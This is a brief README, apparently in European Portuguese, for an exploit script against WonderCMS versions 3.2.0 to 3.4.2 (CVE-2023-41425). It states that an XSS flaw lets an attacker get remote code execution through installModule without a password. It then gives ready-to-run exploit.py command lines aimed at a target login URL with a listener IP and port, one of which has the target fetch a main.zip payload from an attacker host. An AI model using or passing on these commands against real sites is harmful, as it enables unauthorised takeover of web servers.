
WonderCMS RCE CVE-2023-41425
As versões v3.2.0 a v3.4.2 do WonderCMS com vulnerabilidade XSS permitem que um actor malicioso obtenha RCE ao carregar um componente no installModule CVE-2023-41425 (Não é necessário saber a palavra-passe).
Especificando o host remoto de onde o ficheiro main.zip é descarregado
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip
OU não especificando o ficheiro main.zip. Por defeito, descarrega de main.zip
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321
